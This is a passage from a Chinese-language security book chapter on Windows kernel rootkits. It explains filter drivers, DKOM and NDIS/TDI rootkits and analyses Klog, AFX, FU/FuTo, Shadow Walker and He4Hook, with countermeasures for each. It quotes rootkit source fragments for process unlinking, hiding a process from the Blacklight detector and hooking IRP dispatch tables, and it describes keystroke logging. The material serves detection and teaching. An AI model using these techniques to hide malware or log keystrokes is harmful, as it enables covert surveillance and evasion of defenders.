消除大部分这种假阳性的一种方法是,尝试解析所发现的JMP/CALL指令的目标。但是,因为前面提到的原因,这很难做到。如果需要更有启发性的细节,可以参见本书的附录。 过滤器驱动程序和分层驱动程序 在4.3.1节中已经讨论过,大部分Windows驱动程序是分层的(或者堆叠的),这意味着实现底层硬件的特性涉及多个驱动程序。但是,驱动程序不一定必须属于现有的驱动程序/设备栈,本质上也不一定要服务于硬件。这样的驱动程序被称为独立驱动程序(monolithic drivers),它们独立于其他驱动程序或者底层硬件存在。具有讽刺意味的是,独立驱动程序的一个例子就是Rootkit。Rootkit通常不服务于任何硬件。它一般建立一个虚拟设备,为用户模式应用程序(例如Rootkit控制器应用程序)揭示一个句柄。 和独立驱动程序不同,过滤器驱动程序是分层驱动程序的一种,用于为设备添加特定的增强功能,这与实现硬件核心能力的功能或者总线驱动程序形成对比。设备过滤器驱动程序为特定设备类型(如键盘)添加增强功能,类过滤器驱动程序改进整个设备家族(例如输入设备)。设备过滤器驱动程序的一个例子是在某个击键序列(如ctrl-alt-del)产生时启动特殊例程的驱动程序。这个驱动程序展示了过滤器驱动程序的质量,因为它将把自己插入键盘驱动程序链中,并且添加底层输入设备所没有表现出来的特定增强功能。 因为Windows驱动程序是分层设计的,WDM驱动程序规范为驱动程序提供了特殊的API函数,用于连接到现有的驱动程序链(更准确地说是设备栈,因为链中的每个驱动程序将自己的设备连接到服务所有设备的现有设备栈)。所以,如果我们希望将刚才描述的击键序列过滤器驱动程序装入到键盘的设备栈,可以使用那些API函数。连接到设备栈的一般过程如下: 1)调用IoGetDeviceObjectPointer()获得指向设备栈中第一个设备的指针。 2)使用来自设备栈中下一个低层的驱动程序的设备对象信息,用自定义数据初始化自己的设备对象。 3)调用IoAttachDeviceToDeviceStack(),传递一个指向你的初始化设备对象的指针和一个指向你希望连接的设备栈的指针(这个指针从IoGetDeviceObjectPointer()获得)。 在最后一步之后,驱动程序的设备对象被放置在设备栈的顶部。如果驱动程序需要处于堆栈的底部,则必须在其他驱动程序之前连接到设备栈。驱动程序框架没有提供明确的方法来改变优先顺序。注意,在任何时候,其他键盘过滤器驱动程序都可以装入到该驱动程序之上。如果发生这种情况,这个驱动程序会“粘合”在设备栈中,并且必须正确地卸载,否则系统可能会崩溃。 驱动程序接着将开始在键盘操作执行时(接收到一个击键,导致发出一个IRP的轮询事件发生等)从I/O管理器那里接收和发送IRP。它将有机会在设备栈的顶部处理信息。 内核模式Rootkit使用设备栈的这种基本操作来拦截和修改合法驱动程序需要处理的信息(例如文件信息)。内核模式Rootkit最经常采用过滤器驱动程序攻击的设备包括文件系统、键盘和网络栈。当然,内核模式中的任何设备都很容易受到恶意的过滤器驱动程序的影响。过滤器驱动程序通常用于隐藏文件、捕捉击键或者隐藏活动的TCP会话。 过滤器驱动程序对策 因为分层过滤器驱动程序是Windows的基本设计特点,所以没有实用的避免过滤器驱动程序连接到键盘、网络栈、文件系统或者任何其他关键系统设备栈的方法。任何驱动程序都能采用的一种对策是,定期地查询I/O管理器,查看其紧邻的最高或者最低的驱动程序在装入之后是否已经改变。任何改变都值得调查,但是,也可能发生假阳性,因为任何合法的过滤器驱动程序都可以在任何时候连接。过滤器驱动程序连接到设备栈不一定都要引起恐慌,但是这的确可能是恶意的驱动程序正在运作的几种标志之一。 发现设备栈中未经许可的驱动程序的最基本技术是枚举装入的驱动程序的列表(使用前面阐述过的ZwQuerySystemInformation),并且用如下的一种或几种方法筛选“已知是好的”驱动程序: ·根据名称 只检查驱动程序名称,确定其为已知的Windows驱动程序。 ·根据Hash 计算知名的系统驱动程序的唯一hash值。 ·根据签名 Windows 64位操作系统要求所有驱动程序使用Microsoft Authenticode(验证码)技术签名之后,才允许其装入内核空间;供应商必须得到Microsoft发出的用于标记其驱动程序的证书。当驱动程序试图装入时,Authenticode服务秘密验证这个签名;因此,这种技术可以确认所有装入的驱动程序是否进行了验证码签名,或者至少保证所有具有签名的驱动程序是有效的。 当然,手工检查始终是个选项。各种开放源码/免费的工具可以列出系统中安装的设备(虚拟的和物理的)以及连接到这些设备的驱动程序。OSR的DeviceTree(http://www.osronline.com/article.cfm?article=97)就是一个这样的工具。 直接内核对象操纵(DKOM) DKOM由Jamie Butler在与Greg Hoglund合著的《Rootkits:Subverting the Windows Kernel》(Rootkit:颠覆Windows内核)(Addison-Wesley,2005)一书中首次公开。DKOM已经被描述为第三代Rootkit,因为它与传统的API钩子或者映像修改有了很大的不同。目前为止讨论的许多技术都涉及利用侵害机制来挂钩或者重定向普通系统操作的执行流(例如,系统处理文件I/O)。DKOM能够得到和钩子、detour以及前面讨论的许多技术相同的效果,但是不必了解Rootkit插入执行流的位置。 相反,DKOM直接修改内存中本次执行流内核和Executive所使用的内核对象。内核对象是内存中的数据结构,就像我们已经讨论过的SSDT。就像其他应用程序一样,Windows内核必须使用内存操作。当内核在内存中存储这些结构时,这些结构都是脆弱的,容易被其他内核模式驱动程序读取和修改(因为内核空间中没有私有内存的概念)。 但是,DKOM的优点在于,在Windows 2003 Service Pack 1之前,DKOM可以完全由用户模式实现!因为Windows揭示了一个段对象\Device\PhysicalMemory,这个对象映射到系统中所有可寻址的内存,任何用户模式程序都能打开指向这个对象的一个句柄,并且开始修改内核结构。这个重要缺陷在Windows XP Service Pack 2中得以修复。 那么DKOM能够实现什么目标?DKOM的主要功能包括进程隐藏、驱动程序隐藏以及提升进程特权。和挂钩API函数不同,DKOM将修改代表进程、驱动程序和特权的数据结构。 DKOM最常见的实例是FU Rootkit。它能隐藏进程、驱动程序和提升特权。这个Rootkit修改核心内存中记录活动进程的数据结构来隐藏进程。这个数据结构由多个主要的系统API(如ZwQuerySystemInformation())向程序(如任务管理器)报告。修改这些API的数据结构,你就可以在不安装执行流钩子的情况下过滤信息。 研究和识别需要修改的对象之后,DKOM下一个最困难的部分是在内存中寻找想要修改的对象。为了隐藏一个进程,你需要修改的是EPROCESS结构。查找这个结构的最常见途径是调用PsGetCurrentProcess()得到指向当前执行进程的EPROCESS结构的指针,然后遍历存储在LIST_ENTRY字段中的一个链表结构。LIST_ENTRY字段包含两个指针,一个指向前一个进程(FLINK字段),一个指向后一个进程(BLINK字段)。你很容易向前(或者向后)查找,扫描你所希望隐藏的进程名。 现在,当前的EPROCESS结构是你希望隐藏的进程(我们假设你已经循环查找到它并已停止查找),你可以修改周围的进程的EPROCESS结构来隐藏它。具体地说,你必须将后一个进程的FLINK修改为当前进程的FLINK,将前一个进程的BLINK修改为当前进程的BLINK。现在的当前进程(你希望隐藏的)实际上从活动进程链中断开了,而进程链通过调整周围的两个进程的指针而保持有效。FU Rootkit用下面的两行驱动程序源代码来完成这一交换: plist_active_procs=(LIST_ENTRY*)(eproc+FLINKOFFSET); *((DWORD*)plist_active_procs->Blink)=(DWORD)plist_active_procs->Flink; *((DWORD*)plist_active_procs->Flink+1)=(DWORD)plist_active_procs->Blink; 简单地修改这个内核对象,你能够取得和挂钩每个依赖这个对象的API函数相同的效果。DKOM明显是Rootkit作者的强大工具,因为修改是隐蔽的,同时,这一修改影响多个操作系统的运作。 DKOM对策 计算机防御者很幸运,DKOM不是非常可靠,因为它需要预见和了解许多操作系统内部细节,才能正确地实现和移植、在多种平台/体系结构下保持扩展性和兼容性。Rootkit作者必须理解内核使用对象(从初始化到清除)的所有细节,以及修改对象造成的副作用。这意味着Rootkit作者必须花费相当多的时间来对对象进行逆向工程,而这个对象可能完全没有文档记载。而且,对象在操作系统未来的发行版本和补丁中非常容易变化,所以DKOM无法保证能够经受住时间的考验。 DKOM很容易被发现,因为它不能可靠地修改内存中表现相同信息的每个内核对象。例如,Executive的多个组件都保留一个执行进程的列表,所以除非Rootkit修改内存中的每个对象,否则使用交叉查看(cross-view)的Rootkit检测工具在列表比较中查找差异,就能发现Rootkit。 网络驱动程序接口规范(NDIS)和传输驱动程序接口(TDI)Rootkit Windows中网络体系结构的最低级别是物理网络设备,如modem和网卡。对低级协议和硬件组件本身的访问由网络驱动程序接口规范(NDIS)API提供给操作系统中的驱动程序。NDIS工作于数据链路层的上部,网络层之下,对低级协议(如以太网、光纤分布数据接口(FDDI)和异步传输模式(ATM))进行抽象。在NDIS之上是另一个重要的接口传输驱动程序接口(TDI),进一步抽象NDIS细节,提供给更高级别或者中间级别的网络驱动程序。本质上,NDIS使驱动程序能够处理原始封包(和来自物理硬盘的原始字节值很类似),而TDI实现Windows中的TCP/IP协议栈,并且使驱动程序能够在OSI模型的传输层之上操作。 Rootkit可以选择任何一个接口,但是明显越低级的接口越好。因此,真正高级的Rootkit将使用NDIS在OSI模型中的第2层以及更低层次(也就是原始封包)上操作,而更容易发现的Rootkit将挂钩现有的使用TDI的TCP/IP协议栈。即使在TDI级别,也需要很多的信息收集工作才能实现套接字连接性和其他大部分编程人员使用的高级语言概念(例如寻址)。幸运的是,Rootkit作者可以从http://Rootkit.com/newsread.php?newsid=416下载到整个TDI套接字程序库的源代码。大部分信息搜集工作涉及人工定义结构,如本地和远程地址、TCP端口等,然后利用由Windows内建的TDI兼容驱动程序实现的创建例程。 NDIS Rootkit的强大在于它们不依赖Windows内建的网络功能(除了在网络接口卡(NIC)级别上以外),所以任何个人防火墙或者网络监控工具都没有可能发现它及其产生的网络流量。uAy Rootkit就是一个这样的例子,其他流行的NDIS Rootkit包括eEye的bootroot和Hoglund的NT Rootkit。 NDIS对策 NDIS Rootkit是个可怕的对手,只有运行在原始封包级别的防火墙能够捕捉这些怪兽。TDI Rootkit可由运行在TDI层的大部分个人防火墙捕获,除非Rootkit实施某种干扰。免费工具如Sysinternals TdiMon可以用于人工发现可疑的TDI活动。这种方法比较不可靠,并且依赖具有渊博知识的分析人员。 而且,这些类型的Rootkit会创建可被边界设备和入侵检测系统发现的网络流量。因此,包括网络安全度量的全面安全策略(例如,安装在关键边界位置的网络入侵检测系统(NIDS))以及主机保护系统是对付NDIS Rootkit的最佳方法。 4.5 内核模式Rootkit实例 现在,我们将介绍一些应用刚才讨论过的技术的实例。内核模式病毒实例的杰出资源之一可从http://www.f-secure.com/weblog/archives/kasslin_AVAR2006_KernelMalware_paper.pdf.获得。 在我们研究这些实例的时候要记住,这些Rootkit的版本可能与实际中看到的变种不同。为了增加/删除特性和将验证性的Rootkit改造成稳定的产品,Rootkit代码常常被出售、重新分发、改进和重编译。因此,我们的实验中的许多技术、缺陷和/或特性可能与各位读者所经历的有所不同。 4.5.1 Clandestiny创建的Klog 技术:过滤器/分层驱动程序 Klog安装键盘过滤器驱动程序在按键时拦截键盘IRP。每当按下一个键,从键盘发送一个扫描码给操作系统端口驱动程序i8042prt.sys,然后发送给类驱动程序kbdclass.sys。Rootkit可在i8042prt.sys之上安装一个端口过滤器驱动程序,或者在kbdclass.Sys之上安装一个更高级别的过滤器驱动程序。Klog选择后者。 现在我们必须详细说明这个设备栈中的一个典型IRP的生命周期。你可能会问,操作系统如何知道何时按下一个键?从I/O管理器开始的进程发送一个空的IRP给最低级别的驱动程序,这个IRP进入队列直到按下一个键。按键发生时,驱动程序用所有必要的参数填写IRP,通知键盘设备栈中的驱动程序这个操作,这些参数包括IRP主功能码和扫描代码数据。 回忆一下4.3.1节中的讨论,IRP的目的在数据结构的主功能字段中定义。这些功能包括创建、清除、读和写。因此,其他IRP在整个进程期间都要发送。但是,因为你打算记录击键,你所感兴趣的是“读”IRP,因为这些IRP对应读取到的扫描码(你可以由此得到按下的键)。所有其他的IRP必须传递到设备栈的下一个驱动程序。 当空的IRP沿着设备栈传递时,你通过定义在IRP传回给设备栈(按下一个键之后)时一个特殊的例程所要处理的IRP类型,来“标记”感兴趣的IRP。这个函数被称作完成例程(completion routine)。因为你只关注“读”IRP,所以你在填写IRP并且发送回设备栈时将提供希望调用的函数地址。 我们已经介绍了Klog如何在操作系统中放置自身以拦截击键,现在让我们来看看它的实际运作。首先要注意的一点是Klog是个概念验证性Rootkit,并不试图装载或者隐藏自己。因此,许多实际中的其他Rootkit仅仅把Klog源代码作为更高级Rootkit的基础。 为了装入Klog Rootkit驱动程序klog.sys,我们将使用一个小的图形化工具InstDrv。这个免费工具启动或者停止一个服务控制管理器(SCM)创建的临时服务装入/卸载驱动程序。图4-3演示了使用这个工具为Klog驱动程序创建一个服务,并且使用SCM将服务装入内核模式。 Klog将一个包含捕捉到的击键的日志文件写入C:\Klog.txt。图4-4显示,这个日志文件在记事本应用程序中输入几个单词之后增大到1kB。 如果你希望看到日志文件的内容,必须首先用InstDrv停止Klog服务。否则,Windows将警告你该文件当前被其他进程使用。这个进程实际上是Klog初始化,用于处理实际记录的内核模式系统工作线程。停止服务并卸载klog.sys驱动程序,就会调用驱动程序的Unload()例程,在源代码中你可以看到,这个例程停止工作线程。 图 4-3 使用InstDrv装入Klog Rootkit驱动程序 当你试图使用InstDrv卸载驱动程序时会出现一个有趣的问题。当你单击InstDrv的Stop按钮时,该工具要求SCM停止Klog服务并且卸载驱动程序。但是这里有个问题,与本小节前面对“IRP的生命期”的讨论相关。 图 4-4 Klog日志文件随着捕捉击键而增长 回忆一下,创建一个空的IRP等待键盘按下,而这个IRP作了标记,这样I/O管理器在用扫描码填写IRP时将发送这个IRP。这意味着IRP在用户按下一个键之前保持待决(pending)状态。内核驱动程序的一个关键原则是如果驱动程序注册处理的IRP仍然处于待决状态,这个驱动程序就不能卸载。如果这个驱动程序卸载,系统将出现蓝屏错误。这是OS实施的安全机制,因为待决IRP中包含的读操作完成例程的指针现在变为无效。按下一个键并且IRP沿设备栈上传时,将会遇到这个无效的函数地址,导致访问违例。这样,设备栈就会被破坏。 那么,在InstDrv中单击Stop按钮会发生什么事情呢?幸运的是,SCM将会意识到这种情况并且将服务标记为待决卸载(pending unload),同时等待IRP完成。你将会注意到系统变得迟缓;但是,一有按键,系统就返回到正常状态,驱动程序被卸载。这是因为IRP从待决变为激活,我们的函数处理了产生的IRP,SCM终止Klog服务并且卸载该驱动程序。 这种特殊性是考虑内核模式Rootkit副作用时应该记住的:频繁和不能解释的蓝屏可能表示Rootkit有缺陷。 图 4-5 DeviceTree显示连接到键盘类驱动程序的Rootkit 使用OSR的DeviceTree工具,你可以看到Rootkit设备挂钩到操作系统的键盘类驱动程序kbdclass.sys设备栈中。在图4-5中,连接到KeyboardClass0键盘设备栈的Klog设备以绿色突出显示。KeyboardClass0是kbdclass.sys显示的设备名称,所有更高级别的键盘驱动程序都将设备对象连接到这个设备(Klog的设备对象名为\Driver\klog)。 同样,这个Rootkit并不企图隐藏自身。隐蔽性的Rootkit以不同的方式连接(例如,挂钩键盘驱动程序的IRP处理函数)或者隐藏使你发现其运作的痕迹。这些痕迹包括注册表项目、内存中的驱动程序专用结构(例如,DRIVER_OBJECT和DEVICE_OBJECT)以及命名设备对象\Driver\klog。 4.5.2 Aphex创建的AFX 技术:patches/detours AFX Rootkit是2005年用Delphi语言编写的内核模式Rootkit,能够修补Windows API函数来隐藏以下项目:进程、句柄、模块、文件/文件夹、注册表项目、活动网络连接和系统服务。 AFX带有一个装入程序root.exe,它将内部资源解压到一个名为hook.dll的文件。这个文件是AFX用于隐藏所有安装文件夹实例并装入Rootkit驱动程序的一个助手程序库。root.exe工具还将驱动程序解压为临时文件中的一个.tmp文件,并且使用对服务控制管理器的Win32 API调用装入它。root.exe有两个命令行参数:/i表示使用SCM安装Rootkit,/u表示卸载Rootkit。 AFX能够通过API调用CreateRemoteThread()和WriteProcessMemory(),使用代码注入隐藏这些项目,然后在注入的进程地址空间中修补DLL。通过在进程内的Win32 DLL副本(kernel32.dll、user32.dll、advapi32.dll等)搜索特定的函数并且覆盖这些字节,可进行这些修补。AFX使用VirtualProtect()API将旧的函数存储在它的进程的私有地址空间中,这样稍候这些函数就可以脱钩。 AFX针对的是用户模式中显示文件的系统进程(explorer.exe)。通过将修补代码注入explorer.exe,对所有基于Explorer或者Internet Explorer的应用程序(包括命令行)隐藏这些文件。图4-6显示了AFX安装命令及其结果:驱动器C:\(根驱动器)在Explorer中不可见。 图 4-6 AFX立刻隐藏安装目录 AFX的驱动程序接着进一步修补多个Windows API函数。显示所有修补的最简单方法是运行Joanna Rutkowska的System Virginity Verifier(SVV),这个程序比较各种系统二进制代码(例如,AFX修补的原生API DLL)的磁盘和内存函数输出。下面是SVV输出的一个简短版本: ntdll.dll(7c900000-7c9b0000)……suspected!(verdict=5). module ntdll.dll[0x7c900000-0x7c9b0000]: 0x7c90d8e3[NtDeviceIoControlFile()+0]5 byte(s):JMPing code(jmp to:0x10436537) address 0x10436537 DOES NOT belong to ANY MODULE! file:b8 42 00 00 00 memory:e9 54 8c b2 93 verdict=5 0x7c90d94c[NtEnumerateKey()+0]5 byte(s):JMPing code(jmp to:0x10436507) 0x7c90d976[NtEnumerateValueKey()+0]5 byte(s):JMPing code(jmp to:0x10436413) 0x7c90df5e[NtQueryDirectoryFile()+0]5 byte(s):JMPing code(jmp to:0x104367c7) 0x7c90e1aa[NtQuerySystemInformation()+0]5 byte(s):JMPing code(jmp to:0x1043624f) 0x7c9538eb[RtlQueryProcessDebugInformation()+0]5 byte(s):JMPing code(jmp to:0x10436ea7) kernel32.dll(7c800000-7c8f4000)……suspected!(verdict=5). 0x7c802332[CreateProcessW()+0]5 byte(s):JMPing code(jmp to:0x104371e3) 0x7c802367[CreateProcessA()+0]5 byte(s):JMPing code(jmp to:0x1043714b) PSAPI.DLL(76bf0000-76bfb000)……suspected!(verdict=5). 0x76bf1f1c[EnumProcessModules()+0]5 byte(s):JMPing code(jmp to:0x10436fcf)ADVAPI32.dll(77dd0000-77e6b000)……suspected!(verdict=5). 0x77deaf3f[EnumServicesStatusA()+0]5 byte(s):JMPing code(jmp to:0x10436a3b) 0x77df7775[CreateProcessAsUserW()+0]5 byte(s):JMPing code(jmp to:0x10437317) 0x77e10958[CreateProcessAsUserA()+0]5 byte(s):JMPing code(jmp to:0x1043727b) 0x77e15c9d[CreateProcessWithLogonW()+0]5 byte(s):JMPing code(jmp to:0x104373b3) 0x77e3681b[EnumServicesStatusExW()+0]5 byte(s):JMPing code(jmp to:0x10436d9f) 0x77e36a8f[EnumServicesStatusExA()+0]5 byte(s):JMPing code(jmp to:0x10436c77) 0x77e37b91[EnumServicesStatusW()+0]5 byte(s):JMPing code(jmp to:0x10436b6b) SYSTEM INFECTION LEVEL:5 0-BLUE 1-GREEN 2-YELLOW 3-ORANGE 4-RED ——>5-DEEPRED SUSPECTED modifications detected.System is probably infected! AFX修补下列系统二进制代码:ntdll.dll,kernel32.dll,PSAPI.DLL和ADVAPI32.dll。注意,在所有例子中都类似,AFX用(5个字节的JMP+地址)覆盖这些函数,指向0x10436000-0x10437000范围中的一个地址,这个地址范围指向Rootkit的钩子代码。 还要注意,SVV指出覆盖的字节中指向的地址不属于任何模块。这是因为AFX隐藏了进程!你可以使用交叉查看技术找到隐藏的进程,从图4-7中的Helios屏幕截图就能看出(我们将在第10章中介绍Rootkit检测技术)。 图 4-7 Helios发现AFX隐藏进程 补充说明一点,AFX Rootkit是很耗费资源的,因为它使用Dephi编译,没有为Windows系统进行优化。安装AFX后系统明显变得迟缓。 4.5.3 Jamie Butler、Peter Silberman和C.H.A.O.S创建的FU和FUTo 技术:DKOM FU Rootkit以Unix/Linux命令su命名,su命令使用户在账户许可的情况下将权限提升为根用户级别。FU Rootkit以完全不同的方式使用户模式进程将其特权提升到管理员级别,并且隐藏文件、驱动程序和进程。 我们已经详细地介绍了FU的技术,现在再来看看Peter Silberman和C.H.A.O.S编写的FuTo rootkit增加的功能。这个Rootkit基于FU的代码库,但是FuTo不修改进程列表结构,而是修改PspCidTable表结构来隐藏进程。这个未输出的结构维持一个所有活动进程和线程的列表,用于Win32 API函数OpenProcess()。OpenProcess()函数被许多应用程序用来发送句柄给活动进程,这些应用包括流行的Rootkit检测工具Blacklight。因此,FuTo的作者发现了一个愚弄Blacklight的简单方法:只要从PspCidTable中删除进程就可以对Blacklight隐藏。下面是完成这一工作的源代码: typedef PHANDLE_TABLE_ENTRY(*ExMapHandleToPointerFUNC)(IN PHANDLE_TABLE HandleTable,IN HANDLE ProcessId); void HideFromBlacklight(DWORD eproc) { PHANDLE_TABLE_ENTRY CidEntry; ExMapHandleToPointerFUNC map; ExUnlockHandleTableEntryFUNC umap; PEPROCESS p; CLIENT_ID ClientId; map=(ExMapHandleToPointerFUNC)0x80493285; CidEntry=map((PHANDLE_TABLE)0x8188d7c8, LongToHandle(*((DWORD*)(eproc+PIDOFFSET)))); if(CidEntry!=NULL) { CidEntry->Object=0; } return; } 作者采用了一个危险的hack来解决修改PspCidTable所引起的严重问题。当对PspCidTable进行修改时,FuTo设置进程入口为空。这意味着当进程关闭时,系统因为内核模式中废弃一个空指针而出现蓝屏。为了解决这个问题,FuTo rootkit安装了一个通知例程,每当进程关闭时,Rootkit首先得到通知。这使得Rootkit能够重新在活动进程表(PspCidTable)中临时插入隐藏的进程,这样系统就不会崩溃,然后进程可以正常退出。FU没有这个问题,因为目标结构是一个链表,使它可以“重新链接”周围的进程进行隐藏。 4.5.4 Sherri Sparks和Jamie Butler创建的Shadow Walker 技术:IDT钩子 注意:这个Rootkit很大程度上是基于现有的Linux堆栈溢出保护产品PaX(http://pax.grssecurity.net/)和Joanna Rutkowska的研究成果。 Shadow Walker是一个通过创建系统内存的“伪造视图”来隐藏其存在的Rootkit。这种技术的前提是,如果Rootkit能够哄骗检测工具以为读取的是正确的内存,就不需要修改程序执行流(也就是钩子、修补或者detour)或者内存中的数据结构(DKOM)。实际上,系统上的所有其他程序都将接收到一个不精确的内存映射,只有Rootkit知道真正的情况。作者将这种技术称之为内存伪装(memory cloaking)以及“第四代Rootkit技术”(http://www.phrack.org/issues.html?issue=63&id=8#article)。内存伪装的目标一般是隐藏Rootkit自己的代码或者其他一些模块。我们将这种代码称之为伪装代码。 这种骗术通过区分伪装代码的执行请求(最有可能由需要运行自身代码的Rootkit初始化)和伪装代码的读/写请求(由Rootkit检测程序初始化)来完成。因此,Shadow Walker的目标是“欺骗”扫描内存查找Rootkit代码的检测程序,同时仍然允许Rootkit执行。 和许多更高级的Rootkit技术一样,这种技术基于底层处理器的结构性特点。这样,Shadow Walker能够利用奔腾处理器缓冲页面映射方法的一个同步问题来区分内存读/写操作和执行操作。页面映射是处理器将虚拟地址映射到物理地址的方式。 x86汇编指令由指令(例如,发出中断的INT)和数据(指令所带的操作数)组成。为了节约对内存的存取,处理器将最近使用的指令和数据存储到两个并行的缓冲结构中(一个比系统RAM速度更快的特殊存储位置),这两个结构称为快速重编址缓冲器(translation lookasidebuffers,也就是指令快速重编址缓冲器(ITLB)和数据快速重编址缓冲器(DTLB))。这种并行的指令和数据缓冲组织形式称为分离式TLB(Split TLB)。 每当CPU必须执行一个指令数据对时,它必须耗费很多处理开销来查询页面表目录,以得到虚拟地址,然后计算RAM中给定数据的物理地址。如果仅仅查询ITLB中最近使用的指令和DTLB中最近使用的数据(操作数),那么这一步骤的时间就可以节省下来。处理器为同步这两个缓冲器以及保持相同的虚拟到物理地址映射的开销很少。 那么Shadow Walker如何使用这个分离式TLB体系结构来区分内存访问请求呢?简而言之,它强制刷新指令缓冲但是不影响数据缓冲,这样缓冲就不同步并且对于指定页面的相同虚拟到物理映射所保持的值不同。这样,尝试读取伪装的内存页面的Rootkit检测程序实际上取回的是垃圾(或者是一些表示“没有Rootkit!”的数据),因为它们将要读取数据TLB,而Rootkit本身试图在受保护的内存页面执行代码,它读取的是指令TLB,所以可以进行。 在两个TLB中存放不同的内容以完成这些“相同物理页面的不同视图”的逻辑位于一个定制的错误处理程序中。为了启动这个错误处理程序从而控制受保护的内存页面(也就是Rootkit代码)的访问权,Shadow Walker刷新它所希望过滤访问权限(也就是隐藏)的内存页面的指令TLB项目。这实际上强制任何请求经历一次定制的页面错误。 Shadow Walker由两个内核驱动程序实现:mmhook.sys进行分离式TLB欺骗;稍作修改的驱动程序msdirectx.sys保存FU Rootkit的核心。mmhook驱动程序挂钩NTOSKRNL.EXE内部的中断调度表(IDT)。这个驱动程序安装对使这种技术有效很关键的自定义异常处理程序(IDT项目0x0E)。没有使用用户模式控制器程序,所以你必须使用InstDrv或者其他装入程序来将驱动程序放入内核空间(首先装入msdirectx.sys,然后装入mmhook.sys)。装入这些驱动程序以后,它们负责余下的工作,在IDT中安装异常处理程序,这样在页面错误发生时Rootkit自动启动。 你可以尝试访问msdirectx.sys驱动程序的内存地址来看看这种技术的工作状况。你应该会得到垃圾——这意味着mmhook驱动程序正在侵害内存视图。为了测试,你必须使用类似DeviceTree的工具查找misdirectx.sys的基地址。在图4-8显示的DeviceTree截图中,你可能注意到msdirectx驱动程序有些奇怪:没有任何受到支持的主功能代码或者入口点,也没有设备连接到它(所有其他驱动程序都有)!确实如此?一定发生了什么事情。 使用WinHex(或者能够读取任意物理内存的类似工具,如Sysinternals PhysMem),通过对任何来自二进制文件msdirectx.sys中的字节序列进行内存字节模式搜索,你可以验证FU Rootkit的内存页面被mmhook驱动程序隐藏。你可以在装入驱动程序之前或者之后进行这项验证。在装入mmhook之前,你应该能在物理内存中找到这些特征码(也就是Rootkit代码),但是,装入驱动程序之后,你应该找不到这些代码。 Shadow Walker是概念验证性Rootkit的又一个例子,它说明一种技术并且不试图隐藏自己。它也不支持主流的体系结构特性,例如多处理器、PAE或者可变页面尺寸。这个Rootkit的最大局限性可能是对希望使用这个技术隐藏自身的驱动程序所强加的限制性要求,与这个Rootkit一起发布的readme文件说明了驱动程序所必须遵循的一个“协议”,例如,为了隐藏人工提升/降低中断请求级别(IRQL)、刷新TLB以及其他情报搜集工作。但是,这个Rootkit是使用非常低级别硬件设备的高级Rootkit的绝佳范例。 图 4-8 DeviceTree显示msdirectx出了问题 4.5.5 He4 Team创建的He4Hook 技术:IRP钩子 尽管He4Hook项目已于2002年被其作者放弃,但是仍然有许多可用的He4Hook版本(http://he4dev.e1.bmstu.ru/HookSysCall/),每个版本都有不同水平的功能。本质上,所有版本都使用SSDT修改或者IRP钩子来隐藏文件、驱动程序和注册表项目。本书所用的版本2.11采用Windows文件系统驱动程序ntfs.sys和fastfat.sys上的IRP钩子,覆盖了所有驱动程序和连接到文件系统驱动程序设备的主要功能表的以下项目: ·IRP_MJ_CREATE ·IRP_MJ_CREATE_NAMED_PIPE ·IRP_MJ_CREATE_MAILSLOT ·IRP_MJ_DIRECTORY_CONTROL He4Hook用指向Rootkit函数的指针替换指向真实OS函数的指针。它还替换了驱动程序的卸载例程。这个Rootkit直接修改内存中的DRIVER_OBJECT并且替换必要的指针来完成这项工作。 He4Hook Rootkit驱动程序装入之后,它使用Windows API函数ZwOpenDirectoryObject()在系统线程队列中插入一个线程来扫描目录对象\\Drivers and\\FileSystem。对于(使用一个未写入文档的Windows API函数ZwQueryDirectoryObject())从这些列表中读取的每个驱动程序文件,它使用一个未写入文档的输出Windows内核函数ObReferenceObjectByName()来取得指向驱动程序的DRIVER_OBJECT的指针。读取这一指针之后,Rootkit检查该驱动程序的设备栈,枚举所有设备,确保其DEVICE_OBJECT是适合挂钩的设备类型(也就是文件系统相关设备)。DriverObjectHook.C的代码如下: pDeviceObject=pDriverObject->DeviceObject; while(pDeviceObject){ if(IsRightDeviceTypeForFunc(pDeviceObject->DeviceType,IRP_MJ_CREATE)==TRUE){ TopDeviceObject=pDeviceObject; do{ if(IsRightDeviceTypeForFunc(TopDeviceObject->DeviceType,IRP_MJ_CREATE)==TRUE){ pTargetDriverObject=TopDeviceObject->DriverObject; for(i=0;i<=IRP_MJ_MAXIMUM_FUNCTION;++i){ if(pTargetDriverObject->MajorFunction[i]!=NULL){ if(pTargetDriverObject->MajorFunction[i]!=DriverObjectDispatch){ AddHookedDriverIntoTree(pTargetDriverObject); } break; } } } if(TopDeviceObject->AttachedDevice==NULL) break; TopDeviceObject=TopDeviceObject->AttachedDevice; } while(1); } pDeviceObject=pDeviceObject->NextDevice; } 代码中最重要的部分都加粗显示。这个FOR循环枚举给定的驱动程序和设备的所有可能的IRP主功能代码,如果驱动程序中有对应的调度函数,该Rootkit用自己的调度例程DriverObjectDispatch()替换这个函数指针。这是IRP钩子的定义。注意这个Rootkit是如何确定这些函数还未被挂钩的。 这样,Rootkit已经成功地将各个驱动程序的IRP中预定的调度函数重定向到自己的调度函数。很好,现在每微秒都能收到所有类型的设备(从网络命名管道到符号链接)的数百个IRP。为了在噪声中找到主旋律,Rootkit在其调度函数中过滤这些IRP。 我们来更仔细地看看调度函数的源代码,研究一下He4Hook是如何利用IRP钩子,挂钩IRP_MJ_DIRECTORY_CONTROL来隐藏文件的。记住,Rootkit使用的这个函数是一个IRP调度函数,所以每当一个请求(例如文件读请求)发出,这个函数就能检查产生的IRP。Rootkit已经挂钩了必要的IRP;调度函数是它利用这些IRP做些事情(如隐藏文件)的场所。 这个函数的头70行建立数据结构,确定希望过滤的IRP。这通过验证IRP的主功能代码是否为Rootkit所关心的4种代码,以及设备类型是否合适(如CD-ROM、磁盘等)来完成: if((dwMajorFunction==IRP_MJ_SHUTDOWN)||(bIrpAlreadyTreat==FALSE)&& (bIsRightDeviceType==TRUE)&&((dwMajorFunction>=IRP_MJ_CREATE&& dwMajorFunction<=IRP_MJ_CREATE_NAMED_PIPE)|| (dwMajorFunction==IRP_MJ_CREATE_MAILSLOT) #ifdef HOOK_QUERY_DIRECTORY_IRP||( dwMajorFunction==IRP_MJ_DIRECTORY_CONTROL) #endif)) 